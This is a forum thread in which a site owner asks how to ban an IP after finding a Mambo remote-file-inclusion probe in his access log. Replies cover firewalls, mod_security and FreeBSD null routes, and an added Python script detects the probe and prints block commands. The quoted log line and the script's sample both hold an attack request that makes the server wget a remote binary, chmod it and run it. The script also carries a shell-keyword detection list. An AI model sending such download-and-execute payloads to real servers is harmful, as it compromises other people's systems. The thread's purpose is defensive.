banning an IP address

PCTech

Verified User
Joined
Nov 27, 2005
Messages
104
Location
USA
I have this in my access logs:
194.9.90.2 - - [21/Dec/2005:10:38:36 +0000] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

Several entries - doesn't look right. Is there a way to ban an entire IP address? I'm actually getting a bunch of spam that is coming through a form on my website and was seeing if I could find the IP address; this may be it, but I need to know how to ban an entire IP.

Thanks
 
Just add them to the block list of your firewall if you have one. If you don't have one, then I recommend you at least get one. If you are on Linux, there are a bunch of options that all use IPTables. I personally use kiss; another popular one is apf. Both of them have places to put IP addresses you wish to block.
 
Actually, there is a spate of scripts like that running right now. I usually have 10-15 of those hitting my machine at any one time. First off, get mod_security up and running if you don't. That will prevent 90% of what they are trying to do (exploit an XMLRPC issue in PHP). Naturally, update your apache/php if you are behind.

But yes, block them. I personally am blocking entire countries via IPTables / APF. It's not racist or elitist, but in all honesty nobody from China, North Korea, Brazil or Czech Republic has any business on my sites. Thus...blocked. If I had the patience, I'd block everyone except for Australia, Canada, US, UK and Mexico, but that's a big IPTables. Fun.

One thing, if you so feel inclined, put the IP addy into www.arin.net and see if it's a US / Canada based company that owns the IP space. 95% of what's been hitting me has been through RIPE (Euro version of ARIN). But if they are in the US, you can talk to the provider and then the ISP. I've gotten a few shut down that way, and in general it's a good thing because these hosts don't know they've been compromised. This is an automated script that is run via cron and uploaded by a vulnerability in php.
 
Thanks for the info. I don't have a firewall and am new to all of this. My server uses FreeBSD; is there something you would suggest for that? (Maybe a link to it.)

Thanks
 
I'm not in the BSD camp, but I know they use IPFW. Maybe one of the BSD gurus can point out some good resources for you.
 
Sorry to bring up an old thread. In BSD, to block an IP do this, replacing xx with the IP you want to block:

route add xx.xx.xx.xx 127.0.0.1

To block a /24:

route add xx.xx.xx.xx/24 127.0.0.1

The rule will go away if the server is rebooted, or you can enter this to delete it:

route delete xx.xx.xx.xx 127.0.0.1

PCTech said:
Thanks for the info. I don't have a firewall and am new to all of this. My server uses FreeBSD; is there something you would suggest for that? (Maybe a link to it.)

Thanks
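To tie the two halves of the thread together (spotting the probe in the access log, then null-routing the source on FreeBSD), here is an added example in Python; it is not code from the thread or from any of its posters. It parses access-log lines in the combined format PCTech posted, flags requests whose mosConfig_absolute_path parameter points at a remote URL or whose decoded parameters read like a shell command, counts hits per source address, and renders the route commands from the post above for each offender (optionally widened to the /24 form). The sample log lines, the addresses in them (documentation ranges, not the real hosts from the thread) and the function names are constructed for the example.

```python
"""Scan Apache access logs for the Mambo remote-file-inclusion probe shown in
the thread and render FreeBSD route commands for the offending sources.
Added example; sample data and helper names are constructed, not from the thread."""
import ipaddress
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample in Apache combined-log format.  The first and third lines
# mirror the probe pattern from the thread; the second is ordinary traffic.
SAMPLE_LOG = r'''
192.0.2.10 - - [21/Dec/2005:10:38:36 +0000] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://198.51.100.5/cmd.gif?&cmd=cd%20/tmp;wget%20203.0.113.9/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
198.51.100.77 - - [21/Dec/2005:10:40:01 +0000] "GET /index.php?option=com_content&Itemid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [21/Dec/2005:10:41:12 +0000] "GET /mambo/index2.php?mosConfig_absolute_path=http://198.51.100.5/cmd.gif? HTTP/1.1" 404 284 "-" "Mozilla/4.0"
'''

# Combined log format: client, ident, user, [timestamp], "request line", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

# A PHP include path supplied as a remote URL is the signature of the probe:
# the attacker wants index2.php to include a script from their own host.
INCLUDE_PARAMS = {"mosconfig_absolute_path"}
# Decoded parameter values that read like a shell command are equally telling.
SHELL_MARKERS = ("wget ", "curl ", "cd /tmp", "chmod ")


def query_params(target):
    """Yield (key, value) pairs of the request target's query string, decoded.
    Split by hand on '&' only, so ';' inside a value stays inside the value."""
    query = target.partition("?")[2]
    for piece in query.split("&"):
        key, _, value = piece.partition("=")
        yield unquote_plus(key), unquote_plus(value)


def is_rfi_attempt(target):
    """True if the request tries to point an include path at a remote URL or
    smuggles shell commands through a parameter."""
    for key, value in query_params(target):
        lowered = value.lower()
        if key.lower() in INCLUDE_PARAMS and lowered.startswith(("http://", "https://", "ftp://")):
            return True
        if any(marker in lowered for marker in SHELL_MARKERS):
            return True
    return False


def scan(log_text):
    """Count probe attempts per source address.  Addresses that fail to parse
    are dropped so nothing odd in the log ever reaches a route command."""
    hits = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        try:
            ip = str(ipaddress.ip_address(m["ip"]))
        except ValueError:
            continue
        if is_rfi_attempt(m["target"]):
            hits[ip] += 1
    return hits


def block_commands(hits, min_hits=1, aggregate=False):
    """Render the 'route add ... 127.0.0.1' commands from the thread, one per
    offender with at least min_hits probes.  aggregate=True widens each IPv4
    source to its /24 (IPv6 to /64), as the thread's second form does."""
    targets = set()
    for ip, count in hits.items():
        if count < min_hits:
            continue
        addr = ipaddress.ip_address(ip)
        if aggregate:
            prefix = 24 if addr.version == 4 else 64
            targets.add(str(ipaddress.ip_network(f"{ip}/{prefix}", strict=False)))
        else:
            targets.add(ip)
    return [f"route add {t} 127.0.0.1" for t in sorted(targets)]


def unblock_commands(hits, min_hits=1):
    """The matching 'route delete' commands, for when a block is lifted."""
    return [cmd.replace("route add", "route delete", 1)
            for cmd in block_commands(hits, min_hits)]


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for ip, n in found.most_common():
        print(f"{ip}\t{n} probe(s)")
    print("\n".join(block_commands(found)))
```

Review the rendered commands before running them as root rather than piping them straight into a shell, and set min_hits above 1 on a busy server so a single odd request does not null-route a whole customer. As the post above says, routes added this way do not survive a reboot; route(8) on FreeBSD also accepts a -blackhole modifier if you prefer the kernel to drop the packets silently rather than forward them to loopback.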
 